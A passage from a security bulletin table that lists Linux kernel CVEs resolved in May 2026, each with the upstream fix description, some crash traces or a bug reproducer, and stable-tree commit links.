net/netlink/genetlink.c:1210 netlink_rcv_skb+0x16d/0x240 net/netlink/af_netlink.c:2550 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x3e9/0x4c0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x4ab/0x5b0 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:718 [inline] __sock_sendmsg+0xc9/0xf0 net/socket.c:733 ____sys_sendmsg+0x272/0x3b0 net/socket.c:2608 ___sys_sendmsg+0x2de/0x320 net/socket.c:2662 __sys_sendmsg net/socket.c:2694 [inline] __do_sys_sendmsg net/socket.c:2699 [inline] __se_sys_sendmsg net/socket.c:2697 [inline] __x64_sys_sendmsg+0x110/0x1a0 net/socket.c:2697 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xed/0x360 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fc6adb66f6d Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007fc6ac5a6ff8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007fc6addf5fa0 RCX: 00007fc6adb66f6d RDX: 0000000000048084 RSI: 00002000000002c0 RDI: 000000000000000e RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 000000000000 ---truncated--- | 2026-05-06 | not yet calculated | CVE-2026-43252 | https://git.kernel.org/stable/c/d90d73ad183566c81320d453a223f610a280f210 https://git.kernel.org/stable/c/1b3ff4d88b508b73e2bbddb59356311efb7ba192 https://git.kernel.org/stable/c/7c1d221e475e3d8eb8ed4702392d43f8c5134d1f https://git.kernel.org/stable/c/7e4d88e36e5d0b8ffda637999cbca64c81701a81 https://git.kernel.org/stable/c/4d480efd98e290c445f4ba476e4dcda5624b1aab https://git.kernel.org/stable/c/d191101dee25567c2af3b28565f45346c33d65f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: libertas: fix WARNING in usb_tx_block The function usb_tx_block() submits cardp->tx_urb without ensuring that any previous transmission on this URB has completed. If a second call occurs while the URB is still active (e.g. during rapid firmware loading), usb_submit_urb() detects the active state and triggers a warning: 'URB submitted while active'. Fix this by enforcing serialization: call usb_kill_urb() before submitting the new request. This ensures the URB is idle and safe to reuse. | 2026-05-06 | not yet calculated | CVE-2026-43255 | https://git.kernel.org/stable/c/498525d8358d6d20918787e59736d5b6a021e9fd https://git.kernel.org/stable/c/2902a9b4415a6bafc9b1e5dd360f065d757a0bb7 https://git.kernel.org/stable/c/948a39c95d0f8d73722910f8cdb7b6e3e9206232 https://git.kernel.org/stable/c/5bfb25495e391a1be0db94b15715174fa06b93a1 https://git.kernel.org/stable/c/b82073564373e68c6ae3a96039fae14cd002a496 https://git.kernel.org/stable/c/3308c7504e093b22e91a4468470309cee2e26b83 https://git.kernel.org/stable/c/fc188b44547dea4e7350833171982a6312befde9 https://git.kernel.org/stable/c/d66676e6ca96bf8680f869a9bd6573b26c634622 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: cx88: Add missing unmap in snd_cx88_hw_params() In error path, add cx88_alsa_dma_unmap() to release resource acquired by cx88_alsa_dma_map(). | 2026-05-06 | not yet calculated | CVE-2026-43257 | https://git.kernel.org/stable/c/f0d7f735eba963742009b0706e19dd0bed91537a https://git.kernel.org/stable/c/dc911fccc6e08ef46a66b2a42a764252b001ee3c https://git.kernel.org/stable/c/24f3dabeb97bd0bec8c1c926c97e3eb6a8129225 https://git.kernel.org/stable/c/10ab64f8efc2f479293dce929fde326c285fc96f https://git.kernel.org/stable/c/e3fb15aadfc8643203bbdf97ace0396e4586fa64 https://git.kernel.org/stable/c/1ce8c2a8f050a23240553c8bae628ac623f9dbc1 https://git.kernel.org/stable/c/3baefeeb7b85e1e34eebef399ffa312be7179e30 https://git.kernel.org/stable/c/dbc527d980f7ba8559de38f8c1e4158c71a78915 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: phy: fsl-imx8mq-usb: set platform driver data Add missing platform_set_drvdata() as the data will be used in remove(). | 2026-05-06 | not yet calculated | CVE-2026-43259 | https://git.kernel.org/stable/c/42d9509161d0539767ba875f3ef6b4b3c0b425ed https://git.kernel.org/stable/c/06db8c06d94858cda4b3870f421a1aeeef617690 https://git.kernel.org/stable/c/debf8326a435ac746f48173e4742a574810f1ff4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Fix RSS context delete logic We need to free the corresponding RSS context VNIC in FW every time an RSS context is deleted in driver. Commit 667ac333dbb7 added a check to delete the VNIC in FW only when netif_running() is true to help delete RSS contexts with interface down. Having that condition will make the driver leak VNICs in FW whenever close() happens with active RSS contexts. On the subsequent open(), as part of RSS context restoration, we will end up trying to create extra VNICs for which we did not make any reservation. FW can fail this request, thereby making us lose active RSS contexts. Suppose an RSS context is deleted already and we try to process a delete request again, then the HWRM functions will check for validity of the request and they simply return if the resource is already freed. So, even for delete-when-down cases, the netif_running() check is not necessary. Remove the netif_running() condition check when deleting an RSS context. | 2026-05-06 | not yet calculated | CVE-2026-43260 | https://git.kernel.org/stable/c/348a5f8d06c7bdf954e13c17ad5f80b59a075604 https://git.kernel.org/stable/c/079986d6db1f8e3d50c55f400cf998ac9690d2c8 https://git.kernel.org/stable/c/9a9b89eea4a9cc7726702946ff688d716962fabd https://git.kernel.org/stable/c/e123d9302d223767bd910bfbcfe607bae909f8ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: Add support for TSV110 Spectre-BHB mitigation The TSV110 processor is vulnerable to the Spectre-BHB (Branch History Buffer) attack, which can be exploited to leak information through branch prediction side channels. This commit adds the MIDR of TSV110 to the list for software mitigation. | 2026-05-06 | not yet calculated | CVE-2026-43261 | https://git.kernel.org/stable/c/598c11dd4f4a9de31d854fcb9702f54c1c70f0d0 https://git.kernel.org/stable/c/a8d0ad5d990b050a6db74218a34b5529085e16b8 https://git.kernel.org/stable/c/cccf96c49f61e47d9332d6a4d1c7fe9a2df44440 https://git.kernel.org/stable/c/fd7e360845d331f542854d552469544182e61134 https://git.kernel.org/stable/c/5dbe1f14359735fa50ba0dd4a496125b5bc7f422 https://git.kernel.org/stable/c/fd51d47fcacec3ca027eb65d8c44853d3b6cea95 https://git.kernel.org/stable/c/ad0c356cae164ed5dbd1f4cfd438e46faa5292cb https://git.kernel.org/stable/c/e3baa5d4b361276efeb87b20d8beced451a7dbd5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: fiemap page fault fix In gfs2_fiemap(), we are calling iomap_fiemap() while holding the inode glock. This can lead to recursive glock taking if the fiemap buffer is memory mapped to the same inode and accessing it triggers a page fault. Fix by disabling page faults for iomap_fiemap() and faulting in the buffer by hand if necessary. Fixes xfstest generic/742. | 2026-05-06 | not yet calculated | CVE-2026-43262 | https://git.kernel.org/stable/c/5d5d9ec957bfa1eb2b05861c19f5d701dd006db7 https://git.kernel.org/stable/c/cead3bebf3e318578b8a86a5472015d713d2a8a8 https://git.kernel.org/stable/c/e428670cfb2993d8c224effd076242ca6b0950de https://git.kernel.org/stable/c/5d2c4f182ea8516de8682e2b60411c03df00e3ea https://git.kernel.org/stable/c/2e121c53b581e40397ae08090a7af4ed10781fbc https://git.kernel.org/stable/c/9d15fee888f0e8938c9aeed71ec9c2cbba0c88ab https://git.kernel.org/stable/c/e411d74cc5ba290f85d0dd5e4d1df8f1d6d975d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: of: display_timing: fix refcount leak in of_get_display_timings() of_parse_phandle() returns a device_node with refcount incremented, which is stored in 'entry' and then copied to 'native_mode'. When the error paths at lines 184 or 192 jump to 'entryfail', native_mode's refcount is not decremented, causing a refcount leak. Fix this by changing the goto target from 'entryfail' to 'timingfail', which properly calls of_node_put(native_mode) before cleanup. | 2026-05-06 | not yet calculated | CVE-2026-43264 | https://git.kernel.org/stable/c/20881ad42e651c69d89eb38a2042838187900fd6 https://git.kernel.org/stable/c/b5bdcc5afbff845834d04d651773cb6b47db5dd3 https://git.kernel.org/stable/c/2b22e4fe1273c24f405ed7903349c4bbd82b6368 https://git.kernel.org/stable/c/3ed019654234edb8625c05d05e15d40f74e64f70 https://git.kernel.org/stable/c/d6f34bbff07476c6abb8672c89d217824871c5ed https://git.kernel.org/stable/c/69290f2d3999c5fa1a7f5d5593cfc5461fa3ee64 https://git.kernel.org/stable/c/c5734f9030a8b1e13868d1641b5163d8e659306e https://git.kernel.org/stable/c/eacf9840ae1285a1ef47eb0ce16d786e542bd4d7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Ignore -EBUSY when checking nested events from vcpu_block() Ignore -EBUSY when checking nested events after exiting a blocking state while L2 is active, as exiting to userspace will generate a spurious userspace exit, usually with KVM_EXIT_UNKNOWN, and likely lead to the VM's demise. Continuing with the wakeup isn't perfect either, as *something* has gone sideways if a vCPU is awakened in L2 with an injected event (or worse, a nested run pending), but continuing on gives the VM a decent chance of surviving without any major side effects. As explained in the Fixes commits, it _should_ be impossible for a vCPU to be put into a blocking state with an already-injected event (exception, IRQ, or NMI). Unfortunately, userspace can stuff MP_STATE and/or injected events, and thus put the vCPU into what should be an impossible state. Don't bother trying to preserve the WARN, e.g. with an anti-syzkaller Kconfig, as WARNs can (hopefully) be added in paths where _KVM_ would be violating x86 architecture, e.g. by WARNing if KVM attempts to inject an exception or interrupt while the vCPU isn't running. | 2026-05-06 | not yet calculated | CVE-2026-43265 | https://git.kernel.org/stable/c/78265cd066d73a5cb41c088fcae4a2515e480d97 https://git.kernel.org/stable/c/ec3be7dc9391085a2d96700e159d66d1328b7ff6 https://git.kernel.org/stable/c/2657439265d34a911886b916ba8be97ecc117d51 https://git.kernel.org/stable/c/1e88b5f854bdb469424132e0bb44793ad7a7c20a https://git.kernel.org/stable/c/1c957773063ed3264953597e32990a748381caf6 https://git.kernel.org/stable/c/ead63640d4e72e6f6d464f4e31f7fecb79af8869 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EFI/CPER: don't go past the ARM processor CPER record buffer There's a logic inside GHES/CPER to detect if the section_length is too small, but it doesn't detect if it is too big. Currently, if the firmware receives an ARM processor CPER record stating that a section length is big, kernel will blindly trust section_length, producing a very long dump. For instance, a 67 bytes record with ERR_INFO_NUM set 46198 and section length set to 854918320 would dump a lot of data going a way past the firmware memory-mapped area. Fix it by adding a logic to prevent it to go past the buffer if ERR_INFO_NUM is too big, making it report instead: [Hardware Error]: Hardware error from APEI Generic Hardware Error Source: 1 [Hardware Error]: event severity: recoverable [Hardware Error]: Error 0, type: recoverable [Hardware Error]: section_type: ARM processor error [Hardware Error]: MIDR: 0xff304b2f8476870a [Hardware Error]: section length: 854918320, CPER size: 67 [Hardware Error]: section length is too big [Hardware Error]: firmware-generated error record is incorrect [Hardware Error]: ERR_INFO_NUM is 46198 [ rjw: Subject and changelog tweaks ] | 2026-05-06 | not yet calculated | CVE-2026-43266 | https://git.kernel.org/stable/c/c80113dcfc807308f5ab33847fae77e07531aeb8 https://git.kernel.org/stable/c/ca2aad8771aa9091bc9e42e7d546bd40b72ddcd4 https://git.kernel.org/stable/c/a68d22902a6916e10ee235fee609239004e129d0 https://git.kernel.org/stable/c/64eb63f573f497553e1a0c388bbcdd639e0f0704 https://git.kernel.org/stable/c/be10c1bdf64a39832998f54900aa309b3917abcf https://git.kernel.org/stable/c/25b290624b0e3d2f0f90238709ee0b6009b9fde8 https://git.kernel.org/stable/c/45766863baf899059e75595dd3cb1116467f2095 https://git.kernel.org/stable/c/eae21beecb95a3b69ee5c38a659f774e171d730e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: fix potential zero beacon interval in beacon tracking During fuzz testing, it was discovered that bss_conf->beacon_int might be zero, which could result in a division by zero error in subsequent calculations. Set a default value of 100 TU if the interval is zero to ensure stability. | 2026-05-06 | not yet calculated | CVE-2026-43267 | https://git.kernel.org/stable/c/1260bee01493126cf9c872b6ca2af261173baa6d https://git.kernel.org/stable/c/e00c9a4ec84c0bb067833b34202f457badbbc1c1 https://git.kernel.org/stable/c/eb57be32f438c57c88d6ce756101c1dfbcc03bba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: pretend special inodes as regular files Since commit af153bb63a33 ("vfs: catch invalid modes in may_open()") requires any inode be one of S_IFDIR/S_IFLNK/S_IFREG/S_IFCHR/S_IFBLK/S_IFIFO/S_IFSOCK type, use S_IFREG for special inodes. | 2026-05-06 | not yet calculated | CVE-2026-43268 | https://git.kernel.org/stable/c/dcac5582f90b55a267d89769073c5651990b2ec5 https://git.kernel.org/stable/c/799c492a619a10322543d13e6d2a6d27335c868c https://git.kernel.org/stable/c/676bc99d0b3e356cdfec5d8204518e1aac14ec84 https://git.kernel.org/stable/c/de9affb698d5034888314880736925c39d6d048e https://git.kernel.org/stable/c/d209ebaee93fc5089101d34d1b38a91d7abb03fd https://git.kernel.org/stable/c/67407d6abc9520a8a4661285b3ed294eb73ff6e7 https://git.kernel.org/stable/c/9353d4ee26dc33f6ada1646e84660f4c59189763 https://git.kernel.org/stable/c/ed8889ca21b6ab37bc1435c4009ce37a79acb9e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/atmel-hlcdc: fix memory leak from the atomic_destroy_state callback After several commits, the slab memory increases. Some drm_crtc_commit objects are not freed. The atomic_destroy_state callback only put the framebuffer. Use the __drm_atomic_helper_plane_destroy_state() function to put all the objects that are no longer needed. It has been seen after hours of usage of a graphics application or using kmemleak: unreferenced object 0xc63a6580 (size 64): comm "egt_basic", pid 171, jiffies 4294940784 hex dump (first 32 bytes): 40 50 34 c5 01 00 00 00 ff ff ff ff 8c 65 3a c6 @P4..........e:. 8c 65 3a c6 ff ff ff ff 98 65 3a c6 98 65 3a c6 .e:......e:..e:. backtrace (crc c25aa925): kmemleak_alloc+0x34/0x3c __kmalloc_cache_noprof+0x150/0x1a4 drm_atomic_helper_setup_commit+0x1e8/0x7bc drm_atomic_helper_commit+0x3c/0x15c drm_atomic_commit+0xc0/0xf4 drm_atomic_helper_set_config+0x84/0xb8 drm_mode_setcrtc+0x32c/0x810 drm_ioctl+0x20c/0x488 sys_ioctl+0x14c/0xc20 ret_fast_syscall+0x0/0x54 | 2026-05-06 | not yet calculated | CVE-2026-43269 | https://git.kernel.org/stable/c/6d4e91ab97fda64e8cf9c8881cc3b4da026bd849 https://git.kernel.org/stable/c/5718d98976ad6b9700e5a6afec67fc47a8a92580 https://git.kernel.org/stable/c/57fa3487acfa3467405f8506b94682abd96e7393 https://git.kernel.org/stable/c/ec40702029b08ee8d5f5b03303d64a10e74a957b https://git.kernel.org/stable/c/25e832a7830740e72103eb0b527680a4b64bbcb3 https://git.kernel.org/stable/c/082271e364a3205598c2e4e6233a9f49ce7941cf https://git.kernel.org/stable/c/3e64e78f4a70e3f6ac8fe5a7071f08ffd25a2489 https://git.kernel.org/stable/c/f12352471061df83a36edf54bbb16284793284e4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mtk-mdp: Fix a reference leak bug in mtk_mdp_remove() In mtk_mdp_probe(), vpu_get_plat_device() increases the reference count of the returned platform device. Add platform_device_put() to prevent reference leak. | 2026-05-06 | not yet calculated | CVE-2026-43270 | https://git.kernel.org/stable/c/403b7c757ac9f6b2ffb7d00ff4795a245f5e8911 https://git.kernel.org/stable/c/dd530e29bd514d7187b3e2df8eb2107419c7988f https://git.kernel.org/stable/c/c44beed2e5caf2cbbe651432baa3a129f18b0169 https://git.kernel.org/stable/c/564fd3a63efc3ebbdb5d0a8fc7c0d3f753fbbd5d https://git.kernel.org/stable/c/4f2a51433a3a65d16975d1e32052d80656da077d https://git.kernel.org/stable/c/a62ba5aa9ee95fd953583e95e519badf0b76ecf3 https://git.kernel.org/stable/c/2d93758f42a57f3485534eab858b308e41653de4 https://git.kernel.org/stable/c/f128bab57b8018e526b7eda854ca20069863af47 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md-cluster: fix NULL pointer dereference in process_metadata_update The function process_metadata_update() blindly dereferences the 'thread' pointer (acquired via rcu_dereference_protected) within the wait_event() macro. While the code comment states "daemon thread must exist", there is a valid race condition window during the MD array startup sequence (md_run): 1. bitmap_load() is called, which invokes md_cluster_ops->join(). 2. join() starts the "cluster_recv" thread (recv_daemon). 3. At this point, recv_daemon is active and processing messages. 4. However, mddev->thread (the main MD thread) is not initialized until later in md_run(). If a METADATA_UPDATED message is received from a remote node during this specific window, process_metadata_update() will be called while mddev->thread is still NULL, leading to a kernel panic. To fix this, we must validate the 'thread' pointer. If it is NULL, we release the held lock (no_new_dev_lockres) and return early, safely ignoring the update request as the array is not yet fully ready to process it. | 2026-05-06 | not yet calculated | CVE-2026-43271 | https://git.kernel.org/stable/c/a61c1bc84c4a0f1e7c2fe55b0f43d7d94af4adf1 https://git.kernel.org/stable/c/dec123825c1ed74d98fd5fc7571a851dea4f46ff https://git.kernel.org/stable/c/721599e837d3f4c0e6cc14da059612c017b6d3ec https://git.kernel.org/stable/c/dceb5a843910004cb118148e267036104fc3ee43 https://git.kernel.org/stable/c/f150e753cb8dd756085f46e86f2c35ce472e0a3c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ring-buffer: Fix possible dereference of uninitialized pointer There is a pointer head_page in rb_meta_validate_events() which is not initialized at the beginning of a function. This pointer can be dereferenced if there is a failure during reader page validation. In this case the control is passed to "invalid" label where the pointer is dereferenced in a loop. To fix the issue initialize orig_head and head_page before calling rb_validate_buffer. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-05-06 | not yet calculated | CVE-2026-43272 | https://git.kernel.org/stable/c/bc77986f3cb7476637052edf2d87137fa39f153d https://git.kernel.org/stable/c/d9942396845fef2369478c157b26738fe07142f6 https://git.kernel.org/stable/c/f1547779402c4cd67755c33616b7203baa88420b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: supply snapshot context in ceph_zero_partial_object() The ceph_zero_partial_object function was missing proper snapshot context for its OSD write operations, which could lead to data inconsistencies in snapshots. Reproducer: ../src/vstart.sh --new -x --localhost --bluestore ./bin/ceph auth caps client.fs_a mds 'allow rwps fsname=a' mon 'allow r fsname=a' osd 'allow rw tag cephfs data=a' mount -t ceph fs_a@.a=/ /mnt/mycephfs/ -o conf=./ceph.conf dd if=/dev/urandom of=/mnt/mycephfs/foo bs=64K count=1 mkdir /mnt/mycephfs/.snap/snap1 md5sum /mnt/mycephfs/.snap/snap1/foo fallocate -p -o 0 -l 4096 /mnt/mycephfs/foo echo 3 > /proc/sys/vm/drop/caches md5sum /mnt/mycephfs/.snap/snap1/foo # get different md5sum!! | 2026-05-06 | not yet calculated | CVE-2026-43273 | https://git.kernel.org/stable/c/36673344b41c31fb502dd0d0113cec1aa96f581e https://git.kernel.org/stable/c/5788b742007f53406049bef917833a71ddd43f60 https://git.kernel.org/stable/c/757873abfc8ea38592582180aed0f57f0f0cb07a https://git.kernel.org/stable/c/9efa154609cdb658f51c7d76b30a09f7e6485250 https://git.kernel.org/stable/c/531a76c5a2e44264cee8a70121e63eb28c1ba728 https://git.kernel.org/stable/c/69e59a87bab0ea31ab2a584fc65e12dafacf8953 https://git.kernel.org/stable/c/4097e70fc543cca72982854108a32f6ae924e727 https://git.kernel.org/stable/c/f16bd3fa74a2084ee7e16a8a2be7e7399b970907 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Flush exception handling work when RPM level is zero Ensure that the exception event handling work is explicitly flushed during suspend when the runtime power management level is set to UFS_PM_LVL_0. When the RPM level is zero, the device power mode and link state both remain active. Previously, the UFS core driver bypassed flushing exception event handling jobs in this configuration. This created a race condition where the driver could attempt to access the host controller to handle an exception after the system had already entered a deep power-down state, resulting in a system crash. Explicitly flush this work and disable auto BKOPs before the suspend callback proceeds. This guarantees that pending exception tasks complete and prevents illegal hardware access during the power-down sequence. | 2026-05-06 | not yet calculated | CVE-2026-43275 | https://git.kernel.org/stable/c/d5c3a1a13f97355c397f9439d79cb04b182958a3 https://git.kernel.org/stable/c/5d186731bc335cc049d4e57ab9f563cfab95593e https://git.kernel.org/stable/c/aa8d68d97c7f0ef966e51afc17fdbdc372700edf https://git.kernel.org/stable/c/aac2fee7513dd25042a616f86a1469b4858d2c5c https://git.kernel.org/stable/c/78d8e2d6352e8317686ee3a44811ac14c415a57d https://git.kernel.org/stable/c/ab71c146c135f9af1614ef0fc29a0a3b84f1a373 https://git.kernel.org/stable/c/f8ef441811ec413717f188f63d99182f30f0f08e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mana: Fix double destroy_workqueue on service rescan PCI path While testing corner cases in the driver, a use-after-free crash was found on the service rescan PCI path. When mana_serv_reset() calls mana_gd_suspend(), mana_gd_cleanup() destroys gc->service_wq. If the subsequent mana_gd_resume() fails with -ETIMEDOUT or -EPROTO, the code falls through to mana_serv_rescan() which triggers pci_stop_and_remove_bus_device(). This invokes the PCI .remove callback (mana_gd_remove), which calls mana_gd_cleanup() a second time, attempting to destroy the already-freed workqueue. Fix this by NULL-checking gc->service_wq in mana_gd_cleanup() and setting it to NULL after destruction. Call stack of issue for reference: [Sat Feb 21 18:53:48 2026] Call Trace: [Sat Feb 21 18:53:48 2026] <TASK> [Sat Feb 21 18:53:48 2026] mana_gd_cleanup+0x33/0x70 [mana] [Sat Feb 21 18:53:48 2026] mana_gd_remove+0x3a/0xc0 [mana] [Sat Feb 21 18:53:48 2026] pci_device_remove+0x41/0xb0 [Sat Feb 21 18:53:48 2026] device_remove+0x46/0x70 [Sat Feb 21 18:53:48 2026] device_release_driver_internal+0x1e3/0x250 [Sat Feb 21 18:53:48 2026] device_release_driver+0x12/0x20 [Sat Feb 21 18:53:48 2026] pci_stop_bus_device+0x6a/0x90 [Sat Feb 21 18:53:48 2026] pci_stop_and_remove_bus_device+0x13/0x30 [Sat Feb 21 18:53:48 2026] mana_do_service+0x180/0x290 [mana] [Sat Feb 21 18:53:48 2026] mana_serv_func+0x24/0x50 [mana] [Sat Feb 21 18:53:48 2026] process_one_work+0x190/0x3d0 [Sat Feb 21 18:53:48 2026] worker_thread+0x16e/0x2e0 [Sat Feb 21 18:53:48 2026] kthread+0xf7/0x130 [Sat Feb 21 18:53:48 2026] ? __pfx_worker_thread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ret_from_fork+0x269/0x350 [Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ret_from_fork_asm+0x1a/0x30 [Sat Feb 21 18:53:48 2026] </TASK> | 2026-05-06 | not yet calculated | CVE-2026-43276 | https://git.kernel.org/stable/c/fa3c2f8d9152344a478abb847081c1b5f84a94f5 https://git.kernel.org/stable/c/a9a7c3203fdc4d4a8d8a7a3b1ed05d2bb4c6e77e https://git.kernel.org/stable/c/f975a0955276579e2176a134366ed586071c7c6a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: APEI/GHES: ensure that won't go past CPER allocated record The logic at ghes_new() prevents allocating too large records, by checking if they're bigger than GHES_ESTATUS_MAX_SIZE (currently, 64KB). Yet, the allocation is done with the actual number of pages from the CPER bios table location, which can be smaller. Yet, a bad firmware could send data with a different size, which might be bigger than the allocated memory, causing an OOPS: Unable to handle kernel paging request at virtual address fff00000f9b40000 Mem abort info: ESR = 0x0000000096000007 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x07: level 3 translation fault Data abort info: ISV = 0, ISS = 0x00000007, ISS2 = 0x00000000 CM = 0, WnR = 0, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 swapper pgtable: 4k pages, 52-bit VAs, pgdp=000000008ba16000 [fff00000f9b40000] pgd=180000013ffff403, p4d=180000013fffe403, pud=180000013f85b403, pmd=180000013f68d403, pte=0000000000000000 Internal error: Oops: 0000000096000007 [#1] SMP Modules linked in: CPU: 0 UID: 0 PID: 303 Comm: kworker/0:1 Not tainted 6.19.0-rc1-00002-gda407d200220 #34 PREEMPT Hardware name: QEMU QEMU Virtual Machine, BIOS unknown 02/02/2022 Workqueue: kacpi_notify acpi_os_execute_deferred pstate: 214020c5 (nzCv daIF +PAN -UAO -TCO +DIT -SSBS BTYPE=--) pc : hex_dump_to_buffer+0x30c/0x4a0 lr : hex_dump_to_buffer+0x328/0x4a0 sp : ffff800080e13880 x29: ffff800080e13880 x28: ffffac9aba86f6a8 x27: 0000000000000083 x26: fff00000f9b3fffc x25: 0000000000000004 x24: 0000000000000004 x23: ffff800080e13905 x22: 0000000000000010 x21: 0000000000000083 x20: 0000000000000001 x19: 0000000000000008 x18: 0000000000000010 x17: 0000000000000001 x16: 00000007c7f20fec x15: 0000000000000020 x14: 0000000000000008 x13: 0000000000081020 x12: 0000000000000008 x11: ffff800080e13905 x10: ffff800080e13988 x9 : 0000000000000000 x8 : 0000000000000000 x7 : 0000000000000001 x6 : 0000000000000020 x5 : 0000000000000030 x4 : 00000000fffffffe x3 : 0000000000000000 x2 : ffffac9aba78c1c8 x1 : ffffac9aba76d0a8 x0 : 0000000000000008 Call trace: hex_dump_to_buffer+0x30c/0x4a0 (P) print_hex_dump+0xac/0x170 cper_estatus_print_section+0x90c/0x968 cper_estatus_print+0xf0/0x158 __ghes_print_estatus+0xa0/0x148 ghes_proc+0x1bc/0x220 ghes_notify_hed+0x5c/0xb8 notifier_call_chain+0x78/0x148 blocking_notifier_call_chain+0x4c/0x80 acpi_hed_notify+0x28/0x40 acpi_ev_notify_dispatch+0x50/0x80 acpi_os_execute_deferred+0x24/0x48 process_one_work+0x15c/0x3b0 worker_thread+0x2d0/0x400 kthread+0x148/0x228 ret_from_fork+0x10/0x20 Code: 6b14033f 540001ad a94707e2 f100029f (b8747b44) ---[ end trace 0000000000000000 ]--- Prevent that by taking the actual allocated area into account when checking for CPER length. [ rjw: Subject tweaks ] | 2026-05-06 | not yet calculated | CVE-2026-43277 | https://git.kernel.org/stable/c/92ba79074c58e65a6e32713758c5a9aecd33c2ea https://git.kernel.org/stable/c/616c120dcdf1ce96edcd818e38bce49667f80689 https://git.kernel.org/stable/c/f3740a1562445f36f08afab8af59e37117b3acdc https://git.kernel.org/stable/c/e0ec99115e135dbb58e11a0df007c7d4771d4a17 https://git.kernel.org/stable/c/b6be51a12441136fdf8c49b2525689fbea1856e1 https://git.kernel.org/stable/c/6f5d41984ad896736c23e2fff7c80e15c1319132 https://git.kernel.org/stable/c/98bd9b28d4d11e6739ad86524b4be4ada9025e60 https://git.kernel.org/stable/c/fa2408a24f8f0db14d9cfc613ef162dc267d7ad4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mailbox: Prevent out-of-bounds access in fw_mbox_index_xlate() Although it is guided that `#mbox-cells` must be at least 1, there are many instances of `#mbox-cells = <0>;` in the device tree. If that is the case and the corresponding mailbox controller does not provide `fw_xlate` and `of_xlate` function pointers, `fw_mbox_index_xlate()` will be used by default and out-of-bounds accesses could occur due to lack of bounds check in that function. | 2026-05-06 | not yet calculated | CVE-2026-43281 | https://git.kernel.org/stable/c/2662ed331a69c0b551f78af58f12eb629a89a36f https://git.kernel.org/stable/c/31c4c67dec3362094a6747a171a4848e98542265 https://git.kernel.org/stable/c/01d9a8c2615d436b2b30c19c1afe9fcd5726ff6d https://git.kernel.org/stable/c/4caae8168d1b808c7d4ff481295292e3f97f90fb https://git.kernel.org/stable/c/f50b39fd7c72a8734153644ee945ca0d8b2e65ab https://git.kernel.org/stable/c/fcd7f96c783626c07ee3ed75fa3739a8a2052310 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/ionic: Fix potential NULL pointer dereference in ionic_query_port The function ionic_query_port() calls ib_device_get_netdev() without checking the return value, which could lead to a NULL pointer dereference. Fix it by checking the return value and returning -ENODEV if 'ndev' is NULL. | 2026-05-06 | not yet calculated | CVE-2026-43282 | https://git.kernel.org/stable/c/2b96156c927cd83c109e2e3946e6111dce73231f https://git.kernel.org/stable/c/81932a46dfd0db10a03f46f0b1c7ef946ac4552f https://git.kernel.org/stable/c/fd80bd7105f88189f47d465ca8cb7d115570de30 |
